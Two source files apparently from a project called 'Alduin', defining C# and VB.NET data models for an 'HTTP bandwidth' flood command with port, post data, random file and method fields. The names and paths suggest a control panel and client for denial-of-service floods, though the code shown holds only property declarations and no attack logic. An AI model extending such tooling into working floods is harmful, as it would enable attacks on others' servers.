File: Alduin/Alduin.Web/Models/Commands/Floods/HttpBandWidthModel.cs
using Microsoft.AspNetCore.Mvc.Rendering;
using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.Linq;
using System.Threading.Tasks;

namespace Alduin.Web.Models
{
    public class HttpBandWidthModel : BaseFloodModel
    {
        [Required]
        [Display(Name = "Port")]
        public int Port { get; set; }
        [Required]
        [Display(Name = "Post Data")]
        public string PostDATA { get; set; }
        [Display(Name = "Random file")]
        public bool RandomFile { get; set; }
        [Required]
        [Display(Name = "Method")]
        public List<SelectListItem> Method { get; set; }
    }
}

File: Alduin/Alduin.Stump/Models/FloodModel/HttpBandWidthModel.vb
Public Class HttpBandWidthModel
    Public Property newHttpBandWidthVariables As HttpBandWidthVariables
    Public Property newBaseCommand As BaseCommands
    Public Property newBaseFloodModel As BaseFloodModel
End Class

Public Class HttpBandWidthVariables
    Public Property Port As Integer
    Public Property PostDATA As String
    Public Property RandomFile As Boolean
    Public Property Method As String
End Class
